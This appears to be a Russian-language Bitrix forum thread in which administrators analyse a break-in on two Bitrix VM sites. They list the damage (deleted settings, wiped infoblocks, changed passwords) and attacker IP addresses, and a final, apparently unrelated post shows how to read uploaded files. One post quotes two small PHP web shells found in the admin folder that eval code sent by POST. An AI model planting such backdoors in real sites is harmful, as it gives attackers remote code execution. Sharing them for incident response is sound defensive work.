Форум

Коллеги, у кого появился файл /home/bitrix/www/bitrix/admin/sale_discount_heirlooms.php причем с выполнением агента?


[CODE]<?php Z647f323e(@$_POST['5cf118']); function Z647f323e($Jc9c9){ @eval($Jc9e8c9); } ?>
[/CODE]
Хотя на другом ломаном сайте (сайт разработки полный клон основного, пока оставил не тронутым после атаки) на этом агенте выполнялся /home/bitrix/www/bitrix/admin/posting_brownier.php

С содержимым:
[CODE]<?php uf5985d(@$_POST['c5a776fd33']); function uf5985d($jb2e2995c){ @eval($jb2e2995c); } ?> [/CODE]


Раньше на этом агенте выполнялось [CODE]CCaptchaAgent::DeleteOldCaptcha(3600);[/CODE]
И судя по дате агенты появились 27 июня. Основной сайт восстанавливал из вечернего бекапа от 27 июня.

[QUOTE] написал:
[QUOTE] написал:
Были взломаны 2 сайта (основной и сайт для разработки) , оба на разных виртуальных машинах под Bitrix VM 7, сайт под разработку был под htpasswd.

Основной был восставлен из вчерашнего бекапа, обновлён до актуальной версии, как и сам сервер, второй оставлю для поисков проблемы, такое ощущение, что было что-то залито ранее.


Сайт другого клиента не был тронут, обновления были установлены 4 апреля 2022 года, работает не на Bitrix VM.[/QUOTE]
Маловероятно, мы на этих выходных получили 2 сайта и полностью проверяли, один обновлённый сайт не был тронут, на втором без обновлений было абсолютно чисто, взломали сегодня утром.  [/QUOTE]
Смотрю на тестовом папку tmp как написал Анатолий Ерофеев, видимо сначала залили (по логам с IP 185.180.199.209), потом запустили c IP 128.14.133.58.

По поводу какие изменения сделали:
- удалили файл .settings.php,

- заменили главную страницу,

- потерли инфоблоки,

- изменили содержимое агента с ID = 1,

- изменили пароли и хеш пароли на такое содержимое как на третьем скрине.

Были взломаны 2 сайта (основной и сайт для разработки) , оба на разных виртуальных машинах под Bitrix VM 7, сайт под разработку был под htpasswd.

Основной был восставлен из вчерашнего бекапа, обновлён до актуальной версии, как и сам сервер, второй оставлю для поисков проблемы, такое ощущение, что было что-то залито ранее.


Сайт другого клиента не был тронут, обновления были установлены 4 апреля 2022 года, работает не на Bitrix VM.

Если через параметр экшена, то нужно [URL=https://dev.1c-bitrix.ru/learning/course/index.php?COURSE_ID=43&LESSON_ID=21162&LESSON_PATH=3913.3516.5062.3750.21162]внедрять зависимости[/URL].

[S]Лучше[/S] проще запрашивать из объекта контекста:

[CODE]$request = \Bitrix\Main\Context::getCurrent()->getRequest();

$files = $request->getFileList();

// Или одиночный

$file = $request->getFile('name');[/CODE]